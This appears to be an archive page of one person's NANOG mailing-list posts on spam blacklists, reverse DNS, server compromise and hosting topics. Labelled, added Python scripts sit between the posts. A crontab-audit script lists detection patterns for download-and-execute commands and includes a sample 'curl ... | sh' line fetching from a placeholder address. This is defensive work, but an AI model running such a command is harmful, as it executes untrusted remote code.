Re: Please do not respond to Dean and CC the NANOG list

2010-04-15 Thread Ronald Cotoni

On Apr 15, 2010, at 4:26 PM, Jeremy Parr wrote:

> On 15 April 2010 16:18, Dean Anderson  wrote:
>> It won't end until the truth finally prevails and they quit trying to
>> mislead people.
> 
> Can someone remove this guy from the Nanog list please?
> 
He is removed but he still harasses everyone.  Do what I do: auto-respond to
his messages telling him not to email you, then forward to ab...@.  He will get
the hint.


Re: Need advise for a linux firewall

2010-03-11 Thread Ronald Cotoni
On Thu, Mar 11, 2010 at 12:06 PM, gordon b slater  wrote:
> On Thu, 2010-03-11 at 09:01 -0800, Marty Anstey wrote:
>
>> +1 for pfsense. I've been running it for over 18 months with no problems
>> whatsoever. It does everything I needed it to do, and quite a bit more.
>
>
> actually, reading back on the nanog list for a few plays (playing
> catch-up here) pfsense would have made a good contender for the "best
> VPN appliance thread :)
>
> Gord
>
> --
> ALERT: kitchen-sensor-03 reports over-temp
>
>
>
I use pfSense 1.2.3 in my office environment with 4 NICs, 2 100 Mbit
and 2 gigabit.  I have different network segments and all are sharing
the same internet connection.  It works great and has been online
since we moved into this new office a month ago.  I also use it as a
VPN endpoint for when I need to troubleshoot our network and I am out
and about.  It is great and can also do other office-type
filtering/monitoring.  It has Squid plugins, IMSPector plugins and it
also can do tcpdumps (very useful IMHO).

Ronald Cotoni



Re: Security Guideance

2010-02-23 Thread Ronald Cotoni
Quick suggestion, but you may want to have Parallels look into it if
you can't seem to find it, since you pay for the support anyway.  You
may also want to check whether it is a cron job that is doing it (if
the machine was rootkitted, you may have accidentally copied a cron
job over).  Another suggestion would be to simply move half the accounts
to one server and half to another, see if it DDoSes again, and keep
doing that until you find the problem account.

On Tue, Feb 23, 2010 at 2:46 PM, Paul Stewart  wrote:
> Hi folks...
>
>
>
> We have a strange series of events going on in the past while.  Brief
> history here, looking for input from the community - especially some of
> the security folks on here.
>
>
>
> We provide web hosting services - one of our hosting boxes was found a
> while back with root kits installed, unpatched software and lots of
> other "goodies".  With some staff changes in place (don't think I need
> to elaborate on that) we are trying to clean up several issues including
> this particular server.  A new server was provisioned, patched, and
> deployed.  User data was moved over and now the same issue is coming
> back.
>
>
>
> The problem is that a user on this box appears to be launching high
> traffic DOS attacks from it towards other sites.  These are UDP based
> floods that move around from time to time - most of these attacks only
> last a few minutes.
>
>
>
> I've done tcpdumps within seconds of the attack starting and to date
> been unable to find the source of this attack (we know the server, just
> not sure which customer it is on the server that's been compromised).
> Several hours of scanning for php, cgi, pl type files have been wasted
> and come up nowhere...
>
>
>
> It's been suggested to dump IDS in front of this box and I know I'll get
> some feedback positive and negative in that aspect.
>
>
>
> What tools/practices do others use to resolve this issue?  It's a
> Centos 5.4 box running latest Plesk control panel.
>
>
>
> Typically we have found it easy to track down the offending script or
> program - this time hasn't been easy at all...
>
>
>
> Thanks,
>
>
>
> Paul
> 
>
> "The information transmitted is intended only for the person or entity to 
> which it is addressed and contains confidential and/or privileged material. 
> If you received this in error, please contact the sender immediately and then 
> destroy this transmission, including all attachments, without copying, 
> distributing or disclosing same. Thank you."
>
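The "check whether it is a cron job" step suggested at the top of this message, carried out as a script. This is an added example, not code from the thread or from Plesk/Parallels: it parses the text of per-user crontabs and flags entries that trip a few rough heuristics (my own assumptions, as are the constructed sample crontabs), so a box like the one Paul describes can be swept in one pass rather than by eyeballing each file under /var/spool/cron.

```python
"""Audit per-user crontab text for entries that deserve a closer look.

Added example, not code from the NANOG thread.  The heuristics below are a
rough starting point of my own, not a complete signature set, and the sample
crontabs are constructed.  On a real box you would feed it the contents of
every user's crontab file.
"""
import re
from typing import Dict, List

# Command-level heuristics (assumption: my own starting set).
SUSPECT_COMMAND_PATTERNS = [
    (re.compile(r"(^|[\s;&|])/(tmp|var/tmp|dev/shm)/"),
     "runs a program from a world-writable directory"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|perl|python)\b"),
     "downloads something and pipes it into an interpreter"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"),
     "decodes base64 at run time"),
]
ENV_LINE = re.compile(r"^\s*\w+\s*=")


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split crontab text into {schedule, command, raw} entries.

    Comments, blank lines and VAR=value lines are skipped; @reboot-style
    keywords are treated as the schedule.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            schedule, command = parts[0], (parts[1] if len(parts) > 1 else "")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed: fewer than five time fields plus a command
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append({"schedule": schedule, "command": command, "raw": raw})
    return entries


def audit_crontabs(crontabs: Dict[str, str]) -> List[Dict[str, object]]:
    """Return one finding per entry that trips at least one heuristic."""
    findings = []
    for user, text in crontabs.items():
        for entry in parse_crontab(text):
            reasons = [why for pat, why in SUSPECT_COMMAND_PATTERNS
                       if pat.search(entry["command"])]
            if entry["schedule"] == "* * * * *":
                reasons.append("runs every minute")
            if reasons:
                findings.append({"user": user, "line": entry["raw"],
                                 "reasons": reasons})
    return findings


# Constructed sample crontabs (not real data; TEST-NET address).
SAMPLE_CRONTABS = {
    "alice": "MAILTO=alice@example.com\n0 3 * * * /home/alice/bin/backup.sh\n",
    "bob": ("# site housekeeping\n"
            "*/15 * * * * /usr/bin/php /home/bob/site/cron.php\n"
            "* * * * * /tmp/.x/update >/dev/null 2>&1\n"),
    "carol": "30 2 * * 0 curl -s http://203.0.113.7/u.sh | sh\n",
}

if __name__ == "__main__":
    for f in audit_crontabs(SAMPLE_CRONTABS):
        print(f"{f['user']}: {f['line']!r}: {', '.join(f['reasons'])}")
```

On the sample data only bob's every-minute /tmp job and carol's curl-pipe-sh line come back; alice's backup and bob's PHP housekeeping entry pass. A hit is a reason to look, not proof: the point is to get from "several hours scanning files" to a short list of entries per user.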



Re: several messages

2010-02-18 Thread Ronald Cotoni
On Thu, Feb 18, 2010 at 3:25 PM, Patrick W. Gilmore  wrote:
> On Feb 18, 2010, at 3:15 PM, Michelle Sullivan wrote:
>> Dean Anderson wrote:
>>> [Damn. spit out my coffee on keyboard.]
>>>
>>> Levine and Vixie are partners in Whitehat. Whitehat is a commercial bulk
>>> mailer that offers listwashing services (removing spam-traps). MAPS
>>> employees were involved in listwashing.  MAPS, Spamhaus, SORBS do not
>>> block Whitehat, suggesting that the spamtraps removed come from
>>> MAPS/Spamhaus/SORBS
>>>
>>
>> LOL Dean's really lost it finally (if he hadn't before.)  SORBS does not
>> 'not block' anyone (many on here will attest to that); no one is too big
>> or too small to get listed in SORBS.
>>
>> ..but more importantly, and almost on topic unlike Dean's entire
>> post...  I thought Dean was banned for his continual off-topic posts
>> and all the attacks on other people and organisations?
>
> Dean e-mails lots of people directly and CC's the list with his .. uh ..
> missives.  The list members do not see it; just the individual people on the
> To or CC lines see it.
>
> When you reply to the list, /then/ people on the list see it.
>
> I am replying to the list because I want to educate people.  The next time 
> someone gets e-mail from Dean, please do not reply to NANOG.
>
> --
> TTFN,
> patrick
>
>
>

+1 to that.  I had to create a mail filter specifically for him that
takes the message and sends it back with a message saying not to mail me
anymore.  He doesn't get hints very well.



Re: Google to offer fiber to end users

2010-02-10 Thread Ronald Cotoni
On Wed, Feb 10, 2010 at 5:03 PM, Steven Bellovin  wrote:
>
> On Feb 10, 2010, at 4:15 PM, Matt Simmons wrote:
>
>> I'm really interested in their distribution ideas, as well as the
>> bottleneck from the Google network to the rest of the internet.
>>
>> Ah, who am I kidding, it's not like anyone cares about the rest of the
>> internet, right?
>
> The WSJ says:  "In an interview, Google product manager Minnie Ingersoll said 
> consumers
> will be able to buy service directly from Google or from other
> providers, whom Google will allow to resell the service. She said
> Google will manage the deployment of the network but probably partner
> with contractors to help build it."
>
>                --Steve Bellovin, http://www.cs.columbia.edu/~smb
>
I honestly wonder if they will use ipv4 or ipv6 for their rollout...
Could be interesting to watch!



Re: Threading the senderbase reputation needle

2010-02-02 Thread Ronald Cotoni
On Tue, Feb 2, 2010 at 10:32 AM, Drew Weaver  wrote:
> Since email reputation is now being based on the neighborhood theory you
> must do one of the following:
>
> Do one of the following (hopefully #1):
>
> 1.) Provide custom reverse DNS for the customer.  BCP for SMTP server DNS
> is matching forward and reverse DNS.  Anything else is suspect...
>
> 2.) Set up a relay host and funnel all customers mail through it.
>
> Side effects of each:
>
> 1.) Slightly more work on the front end (but hey, even AT&T will do this
> for business DSL customers).  People will know you have clue.  The
> technical staff at your customers will be happy and recommend you to their
> peers (well, I guess this depends a bit on what kind of customers you
> have).
>
> 2.) You have taken responsibility for all your customers' outbound mail
> flows.  You will need to scale an abuse desk and maintain effective
> anti-spam policies (including customer education).  If you don't run an
> effective abuse desk (including blocking your own customers outbound mail
> when necessary), you will be blacklisted eventually anyway.  You could
> charge extra for or outsource this ESP service.
> ==
>
> Okay, as I mentioned, we allow the customers to set their reverse DNS to 
> whatever they want as long as the forward and the reverse match.  We don't own
> the customer's domains nor do we host the DNS for 99% of them, so I'm not 
> sure how we could enforce a rule saying that everyone on our network has to 
> have their reverse DNS set a certain way. That is why we set it up like we 
> did, because we can control hostnames within our domain and we can set the 
> PTR record to match. Like I said before we're a hosting company, we sell 
> Co-Lo, Dedicated servers, and Virtualization products.
>
> It seems somewhat impossible to employ either of your suggestions in our 
> environment.
>
> thanks,
> -Drew
>

I used to work at a hosting company and we had a few solutions in
place.  Whenever a client purchased a server or an additional block
of IPs, it was assigned the reverse DNS related to the hostname of
their server.  This even included example.com sometimes.  The client
could then change it as they wished.  Another option we had was an
outgoing spam filter set up with ASSP.  This scrubbed all outgoing mail
for spam messages.  Honestly the first option was good enough for most
people.  About 99.95% of your clients assign a forward DNS for their
server/colo/virtualization products.  Just make it a requirement that
they provide that before you turn up their service.  This prevents
DUHLs from listing you for those generic RDNS names.
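The forward/reverse agreement the thread keeps coming back to, together with the "require it before you turn up their service" rule in the post above, written out as an added example that is not the thread's own code. DNS lookups are injected functions so the script runs offline against constructed example.com/TEST-NET records; the `looks_generic` heuristic is my own rough rule, not any DUHL's published criteria, and a real deployment would plug in a resolver such as dnspython's in place of the fake tables.

```python
"""Forward-confirmed reverse DNS (FCrDNS) check for mail-sending hosts.

Added example, not code from the NANOG thread.  It tests the property the
thread treats as the baseline for an SMTP source: the PTR name of the sending
address must resolve back to that same address.  It also flags PTR names that
look like the generic, auto-generated kind a DUHL might list.  Lookups go
through injected functions; the tables at the bottom are constructed records
(assumption: a real run would use an actual resolver).
"""
import ipaddress
import re
from typing import Callable, Dict, List

PtrLookup = Callable[[str], List[str]]  # address -> PTR names
ALookup = Callable[[str], List[str]]    # name -> addresses

# "Generic" reverse name: the address embedded in the name, or a dynamic-pool
# token.  Assumption: my own rough rule, not any DNSBL's criteria.
GENERIC_RE = re.compile(
    r"\d{1,3}[-.]\d{1,3}[-.]\d{1,3}[-.]\d{1,3}"
    r"|\b(dyn|dynamic|dhcp|dial|dialup|ppp|pool)\b",
    re.IGNORECASE,
)


def looks_generic(ptr_name: str) -> bool:
    return GENERIC_RE.search(ptr_name) is not None


def check_fcrdns(ip: str, ptr_lookup: PtrLookup, a_lookup: ALookup) -> Dict[str, object]:
    """Classify one address as ok / mismatch / no-ptr, with the PTR it found."""
    ip = str(ipaddress.ip_address(ip))  # normalise; raises ValueError on garbage
    ptr_names = ptr_lookup(ip)
    if not ptr_names:
        return {"ip": ip, "status": "no-ptr", "ptr": None, "generic": False}
    for name in ptr_names:
        if ip in a_lookup(name):  # forward confirms reverse
            return {"ip": ip, "status": "ok", "ptr": name,
                    "generic": looks_generic(name)}
    return {"ip": ip, "status": "mismatch", "ptr": ptr_names[0],
            "generic": looks_generic(ptr_names[0])}


def ready_for_turnup(ip: str, ptr_lookup: PtrLookup, a_lookup: ALookup) -> bool:
    """Provisioning gate: forward and reverse agree and the name is not generic."""
    r = check_fcrdns(ip, ptr_lookup, a_lookup)
    return r["status"] == "ok" and not r["generic"]


def audit_block(cidr: str, ptr_lookup: PtrLookup, a_lookup: ALookup) -> Dict[str, List[str]]:
    """Summarise every host address in an assigned block by FCrDNS status."""
    summary: Dict[str, List[str]] = {"ok": [], "generic": [], "mismatch": [], "no-ptr": []}
    for host in ipaddress.ip_network(cidr).hosts():
        r = check_fcrdns(str(host), ptr_lookup, a_lookup)
        key = "generic" if (r["status"] == "ok" and r["generic"]) else r["status"]
        summary[key].append(str(host))
    return summary


# Constructed records: reserved example names and TEST-NET-1 addresses.
FAKE_PTR = {
    "192.0.2.10": ["mail.example.com."],
    "192.0.2.11": ["192-0-2-11.static.example.net."],  # forward matches, but generic
    "192.0.2.12": ["mail.example.org."],               # forward points elsewhere
    "192.0.2.13": [],                                  # no PTR at all
}
FAKE_A = {
    "mail.example.com.": ["192.0.2.10"],
    "192-0-2-11.static.example.net.": ["192.0.2.11"],
    "mail.example.org.": ["203.0.113.5"],
}


def fake_ptr_lookup(ip: str) -> List[str]:
    return FAKE_PTR.get(ip, [])


def fake_a_lookup(name: str) -> List[str]:
    return FAKE_A.get(name, [])


if __name__ == "__main__":
    for status, hosts in audit_block("192.0.2.8/29", fake_ptr_lookup, fake_a_lookup).items():
        print(f"{status:9s} {', '.join(hosts) or '-'}")
```

Run over the constructed /29 it reports one clean host, one that confirms but carries an address-shaped name, one mismatch and three addresses with no PTR; only the first passes `ready_for_turnup`. The address-in-name case is exactly the kind of entry the thread says DUHLs pick up, which is why the gate rejects it even though forward and reverse agree.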



Re: SORBS on autopilot?

2010-01-15 Thread Ronald Cotoni
On Fri, Jan 15, 2010 at 10:17 AM, Michelle Sullivan  wrote:
> telmn...@757.org wrote:
>>>
>>> Did SORBS really cause you that much pain?
>>
>> Yes. We purchased colo space for some systems that didn't need high class
>> of service (mostly development systems.) The IP space in a former lifetime
>> was a dialup pool for analog modems.
>>
>> We of course changed the reverse DNS entries, and did the normal request
>> with SORBS. Nothing really happened. I started looking into it, and finding
>> stories of people doing the mandatory $90 donation to get express attention,
>
> ...and at this point we know the poster (like a fair few others in this
> thread) is either talking c**p or mixing SORBS with some other list.  There
> is NO donation required for non spam listings (a DUHL entry is not a spam
> listing) and $90 is plucked from thin air... a  cursory look at the SORBS
> website will attest to that.
>
>
> Michelle
>
> Note: The original poster was noted to have never opened a ticket @ SORBS by
> one of the staff..  I haven't verified that personally, but it does follow a
> common theme..  People complain about listings and have subsequently been
> found to have *not* requested delisting through the correct channel (the
> SORBS support system)...  I wonder how many would get this sort of response
> (a fiery NANOG thread) if they complained their ADSL was broken to the
> yellowpages sales line...?!?!?
>
>
At the same time, I never hear this about spamhaus or outblaze.  Go
figure :( Maybe your system is too confusing and you might want to
take a survey and revamp it to something a bit more functional.



Re: more news from Google

2010-01-13 Thread Ronald Cotoni
It was to others :)  But in the process of troubleshooting, an admin
may come across something, say by looking at a bounce message or other
statistics such as which domains the user sends to on a regular basis.
cPanel even comes with Eximstats which does some of that for you.

On Wed, Jan 13, 2010 at 2:56 PM, Joe Abley  wrote:
>
> On 2010-01-13, at 14:51, Ronald Cotoni wrote:
>
>> You should most likely read their terms of service and that would
>> actually answer this instead of guessing.
>
> I've read the terms of service. I may be interpreting them incorrectly, sure, 
> but I'm not guessing.
>
> If your comment was not directed at me, but was a more general recommendation 
> for all people who might guess rather than read, then sure, I agree.
>
>
> Joe
>
>



Re: more news from Google

2010-01-13 Thread Ronald Cotoni
You should most likely read their terms of service; that would
actually answer this instead of guessing.  Also, if you're reading your
own employees' email, that is most likely perfectly legal.

On Wed, Jan 13, 2010 at 2:22 PM, Joe Abley  wrote:
>
> On 2010-01-13, at 11:31, Anthony Uk wrote:
>
>> The ability to automatically discern users' political positions from their 
>> inbox is not one that any email provider reasonably needs.
>
> It's arguably something that gmail users consent to when they give Google 
> rights to index and process their mail, though.
>
>
> Joe
>



Re: cable provider problems yesterday around 1pm EST?

2010-01-13 Thread Ronald Cotoni
Were there any problems on the internet at 1 PM EST yesterday :)  But
honestly which provider and in what area?

On Wed, Jan 13, 2010 at 11:23 AM, Steve Meuse  wrote:
> Rich Casto expunged (richca...@gmail.com):
>
>> Is anyone aware of any routing problems with any cable providers yesterday
>> around 1pm EST?  Thanks!
>
> I dare you to be more vague
>
> -Steve
>
>
>



Re: Arrogant RBL list maintainers

2009-12-10 Thread Ronald Cotoni
On Thu, Dec 10, 2009 at 8:20 AM, Tony Finch  wrote:
> On Thu, 10 Dec 2009, Chris Edwards wrote:
>> On Wed, 9 Dec 2009, Michael Holstein wrote:
>>
>> | Their initial email said :
>> |
>> | [snip]
>> | Trend Micro Notification: 137.148.0.0/16 added to DUL
>> | [snip]
>>
>> Oh dear.  I can see why many sites that once used MAPS now don't :-(
>
> It isn't just idiocy like this thread. They never expire entries from the
> RBL, even when IP address space changes hands. The most stupid thing is
> that they will not accept bug reports from their customers, insisting that
> they come from the sender (not recipient). WTF?!
>
> Tony.
> --
> f.anthony.n.finch    http://dotat.at/
> GERMAN BIGHT HUMBER: SOUTHWEST 5 TO 7. MODERATE OR ROUGH. SQUALLY SHOWERS.
> MODERATE OR GOOD.
>
>
Very true.  At my old place of employment a DUHL had listed an IP since
before my previous company existed.  For some reason, when we obtained
it, they still listed it.  Sounds like a bug in the DUHL bot to me.
Also the standard makes a lot of sense.  You may be on Trend Micro's
DUHL by following the rules on SORBS DUHL and vice versa.  Makes life
a pain.



Re: Repeated Blacklisting / IP reputation

2009-09-08 Thread Ronald Cotoni

Joe Greco wrote:
>> there is a fundamental disconnect here.  the IP space is neutral.
>> it has no bias toward or against social behaviours.  it's a tool.
>> the actual/real target here are the people who are using these tools
>> to be antisocial.  blacklisting IP space is always reactive and
>> should only be used in emergency and as a -TEMPORARY- expedient.
>>
>> IMHO of course, YMMV.
>
> Show me ONE major MTA which allows you to configure an expiration for
> an ACL entry.
>
> The problem with your opinion, and it's a fine opinion, and it's even a
> good opinion, is that it has very little relationship to the tools which
> are given to people in order to accomplish blocking.  Kind of the question
> I was contemplating in my other message of minutes ago.
>
> If people were given an option to "block this IP for 30 minutes, 24 hours,
> 30 days, 12 months, 5 years, or forever" - I wonder how many people would
> just shrug and click "forever."
>
> This may lead to the discovery of another fundamental disconnect - or two.
>
> Sigh.
>
> ... JG

A cron job/scheduled task with a script that removes said line would most
likely do wondrous things for you.  I could see a comment before each
listing with a time/date that you use some regex fu on to figure out how
long it was there and how long it should be there for.  Simple!  You
could also automate it with a web frontend for noobs so they don't have
to manually edit configuration files.
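The cron-job-with-a-timestamp-comment idea from the post above, written out. This is an added example, not code from the thread or from any MTA: the `# expires <UTC stamp>` marker convention, the `deny` line syntax and the sample ACL are assumptions of mine, and reloading whatever program reads the file after it is rewritten is left to the cron wrapper. It also covers the "30 minutes, 24 hours, 30 days, ... forever" menu Joe describes: `expiry_marker` turns a chosen TTL into the marker line, and an entry with no marker is "forever".

```python
"""Expire block-list entries from a timestamp comment, as a cron job could.

Added example, not code from the NANOG thread.  Convention (my own
assumption): the line immediately before an entry may read
`# expires <UTC timestamp>`; a run drops entries whose stamp has passed.
Entries without a marker are permanent.  A marker that does not parse keeps
its entry and is reported, so a typo never silently unblocks anything.
"""
import re
from datetime import datetime, timedelta, timezone
from typing import List, Tuple

EXPIRES_RE = re.compile(r"^\s*#\s*expires\s+(\S+)\s*$")
STAMP_FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_expiry(stamp: str) -> datetime:
    """Parse a marker timestamp; raises ValueError on anything else."""
    return datetime.strptime(stamp, STAMP_FMT).replace(tzinfo=timezone.utc)


def expiry_marker(now: datetime, ttl_seconds: int) -> str:
    """Marker line for an entry that should live ttl_seconds from now."""
    return "# expires " + (now + timedelta(seconds=ttl_seconds)).strftime(STAMP_FMT)


def prune_expired(text: str, now: datetime) -> Tuple[str, List[str], List[str]]:
    """Return (new_text, removed_entries, warnings) for one ACL file."""
    kept, removed, warnings = [], [], []
    pending = None  # (marker line, expiry or None) waiting for its entry
    for lineno, line in enumerate(text.splitlines(), 1):
        m = EXPIRES_RE.match(line)
        if m:
            if pending is not None:  # two markers in a row: the first applies to nothing
                kept.append(pending[0])
            try:
                expiry = parse_expiry(m.group(1))
            except ValueError:
                warnings.append(f"line {lineno}: cannot parse expiry {m.group(1)!r}; entry kept")
                expiry = None
            pending = (line, expiry)
            continue
        if pending is None or not line.strip() or line.lstrip().startswith("#"):
            if pending is not None:  # marker followed by a blank/comment, not an entry
                kept.append(pending[0])
                pending = None
            kept.append(line)
            continue
        marker, expiry = pending
        pending = None
        if expiry is not None and expiry <= now:
            removed.append(line.strip())
        else:
            kept.extend([marker, line])
    if pending is not None:  # marker on the last line with nothing after it
        kept.append(pending[0])
    new_text = "\n".join(kept)
    if text.endswith("\n"):
        new_text += "\n"
    return new_text, removed, warnings


# Constructed sample ACL (TEST-NET addresses, made-up syntax).
SAMPLE_ACL = (
    "# expires 2010-09-01T00:00:00Z\n"
    "deny 192.0.2.5\n"
    "# expires 2010-12-01T00:00:00Z\n"
    "deny 198.51.100.0/24\n"
    "deny 203.0.113.9\n"
    "# expires not-a-date\n"
    "deny 203.0.113.10\n"
)
NOW = datetime(2010, 9, 8, tzinfo=timezone.utc)

if __name__ == "__main__":
    new_text, removed, warnings = prune_expired(SAMPLE_ACL, NOW)
    print(new_text, end="")
    print("removed:", removed)
    print("warnings:", warnings)
```

Against the sample, a run dated 2010-09-08 drops only the first entry, keeps the permanent one and the one expiring in December, and reports the unparseable marker instead of acting on it. In a real cron wrapper you would write `new_text` to a temporary file, rename it over the original, and only then reload the MTA or firewall.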



Re: Repeated Blacklisting / IP reputation

2009-09-08 Thread Ronald Cotoni

Tom Pipes wrote:
> Greetings,
>
> We obtained a direct assigned IP block 69.197.64.0/18 from ARIN in 2008.
> This block has been cursed (for lack of a better word) since we obtained
> it.  It seems like every customer we have added has had repeated issues
> with being blacklisted by DUL and the cable carriers (AOL, AT&T, Charter,
> etc).  I understand there is a process to getting removed, but it seems
> as if these IPs had been used and abused by the previous owner.  We have
> done our best to ensure these blocks conform to RFC standards, including
> the proper use of reverse DNS pointers.
>
> I can resolve the issue very easily by moving these customers over to our
> other direct assigned 66.254.192.0/19 block.  In the last year I have done
> this numerous times and have had no further issues with them.
>
> My question: Is there some way to clear the reputation of these blocks up,
> or start over to prevent the amount of time we are spending with each
> customer troubleshooting unnecessary RBL and reputation blacklisting?
>
> I have used every opportunity to use the automated removal links from the
> SMTP rejections, and worked with the RBL operators directly.  Most of what
> I get are cynical responses and promises that it will be fixed.
>
> If there is any question, we perform inbound and outbound scanning of all
> e-mail, even though we know that this appears to be something more relating
> to the block itself.
>
> Does anyone have any suggestions as to how we can clear this issue up?
> Comments on or off list welcome.
>
> Thanks,
>
> ---
> Tom Pipes
> T6 Broadband/
> Essex Telcom Inc
> tom.pi...@t6mail.com
>

Unfortunately, there is no real good way to get yourself completely
delisted.  We are experiencing that with a /18 we got from ARIN recently
and it is basically the RBLs not updating, or perhaps they are not
checking the ownership of the IPs as compared to before.  On some
RBLs, we have IP addresses that have been listed since before the
company I work for even existed.  Amazing, right?




Re: Issues with Gmail

2009-09-01 Thread Ronald Cotoni

Dominic J. Eidson wrote:
> It appears to be much more a problem with gmail (the MUA) than gmail
> (the MDA).
>
> Gmail/imap appears to be working fine, at least from AUS.
>
>  - d.
>
> On Tue, 1 Sep 2009, Kameron Gasso wrote:
>
>> Jim Wininger wrote:
>>> Anyone else seeing issues with gmail?
>>
>> Yep, it's been throwing 502 HTTP errors for about 25 minutes now.  We've
>> been getting a handful of calls from frantic Gmail users wondering why
>> we broke their interwebs. ;)
>

Works fine from Chicago via IMAP.



Re: MTAs used

2009-08-26 Thread Ronald Cotoni
http://www.google.com/search?q=list+of+the+most+used+MTAs&ie=utf-8&oe=utf-8&aq=t&rls=com.frontmotion:en-US:unofficial&client=firefox-a and
http://www.google.com/search?q=MTA+market+share&ie=utf-8&oe=utf-8&aq=t&rls=com.frontmotion:en-US:unofficial&client=firefox-a

On Wed, Aug 26, 2009 at 8:50 AM, Sharef Mustafa wrote:

> Hi,
>
>
>
> Can anyone please point me to a list of the most used MTAs (mail
> servers) and their market share?
>
>
>
> BR
>
>


Can someone from earthlink contact me offlist

2009-08-11 Thread Ronald Cotoni
I need to talk to someone at earthlink who is a mail administrator?


Re: several messages

2009-07-14 Thread Ronald Cotoni
And I still have yet to get someone from sorbs to contact me off list.  I
wonder if they actually read email (highly doubtful at this point)


Re: Can someone from SORBS contact me offlist?

2009-07-11 Thread Ronald Cotoni
Sadly, this is for remote hosts.  I have no idea why someone would use such
services as there are too many false positives.  It is like using an IDS
that is 2 weeks behind on its definitions.  That brings up the point of
false positives and outdated information blocking legitimate users, perhaps
many, which is what my company is experiencing since they deem certain
reverse DNS entries too "generic" and blacklisted a /18.  I believe that is
why no one knows if they will be bought or whatnot.  Who knows.

On Sat, Jul 11, 2009 at 1:50 PM, John Souvestre  wrote:

> Hi Brielle.
>
> Do they take two weeks to put a spammer on the list?
>
> Regards,
>
> John
>
>John Souvestre - New Orleans LA
>
>  > -Original Message-
>  > From: Brielle Bruns [mailto:br...@2mbit.com]
>  > Sent: Saturday, July 11, 2009 12:12 PM
>  > To: nanog@nanog.org
>  > Subject: Re: Can someone from SORBS contact me offlist?
>  >
>  > On 7/11/09 11:05 AM, Ronald Cotoni wrote:
>  > > Yes, they are really bad.  It is actually quite silly that a
> blacklisting
>  > > service is that slow on responding to problems.
>  >
>  > I find it unacceptable that people demand instant service from a company
>  > they don't have prior business arrangements/relationship with.  Average
>  > turn around time for the AHBL is around two weeks if we don't have an
>  > established contact and procedure with.
>  >
>  > How would you like it if a non-customer came to you demanding resolution
>  > to a problem with a free service you provide?  Would you drop
>  > everything, and give that non-customer the same service you give a
>  > paying customer?
>  >
>  >
>  > --
>  > Brielle Bruns
>  > The Summit Open Source Development Group
>  > http://www.sosdg.org/ http://www.ahbl.org
>
>
>


Re: Can someone from SORBS contact me offlist?

2009-07-11 Thread Ronald Cotoni
Yes, they are really bad.  It is actually quite silly that a blacklisting
service is that slow on responding to problems.

On Sat, Jul 11, 2009 at 11:45 AM, John Peach wrote:

> On Sat, 11 Jul 2009 11:34:58 -0500
> James Hess  wrote:
>
> > On Sat, Jul 11, 2009 at 11:08 AM, Christopher
> > Morrow wrote:
> > > >From www.sorbs.net:
> > > "It comes with great sadness that I have to announce the imminent
> > [snip]
> >
> > You might want to read the June 25th update they made to the
> > announcement, as shown on the very same page.
> >
>
> SORBS has never had a good reputation over removals..
>
> --
> John
>
>


Can someone from SORBS contact me offlist?

2009-07-11 Thread Ronald Cotoni
I need to resolve some issues that we are having with you guys but there is
a lack of timeliness with your contact forms; 28 days is simply unacceptable
:(


Re: Why choose 120 volts?

2009-05-28 Thread Ronald Cotoni
I have some similar input.  At my company, we use both 120 and 208
volt depending on what servers we are putting in the racks.  We can
fill up every single rack to full capacity 100% of the time by using
energy efficient servers.  The fact that it is 120 volt or 208 volt
hardly matters on most machines except Xeon/Opteron class systems.
We use a lot of Core 2 Duo, Atom and Xeon Low Voltage processors.
This allows us higher density on the same power and makes 208 volt
mostly irrelevant.

On Thu, May 28, 2009 at 11:18 AM, William Pitcock
 wrote:
> On Tue, 2009-05-26 at 12:39 -0700, Seth Mattinen wrote:
>> I have a pure curiosity question for the NANOG crowd here. If you run
>> your facility/datacenter/cage/rack on 120 volts, why?
>>
>
> We are using 120V in our colocation spaces.
>
>> I've been running my facility at 208 for years because I can get away
>> with lower amperage circuits. I'm curious about the reasons for using
>> high-amp 120 volt circuits to drive racks of equipment instead of
>> low-amp 208 or 240 volt circuits.
>
> The reason why we are using 120V is because we have pre-existing
> equipment (such as PDUs) that only support 120V operation.  I believe
> our newer PDUs support 120/208/240, but do not have the time to
> investigate that, and we still have a couple of older APC units still in
> service.  Our servers don't really care which voltage we provide, most
> of the PSUs can determine 120 vs 240 automatically, even.
>
> Also, at least at Equinix Chicago, 120V service was cheaper when we
> colocated there.  I do not know if this is the same case at Steadfast in
> Chicago, and as far as I know, HE does not offer 208/240 service in
> their Fremont-2 facility.  I could be misinformed on that, though.
> --
> William Pitcock
> SystemInPlace - Simple Hosting Solutions
> 1-866-519-6149
>
>
>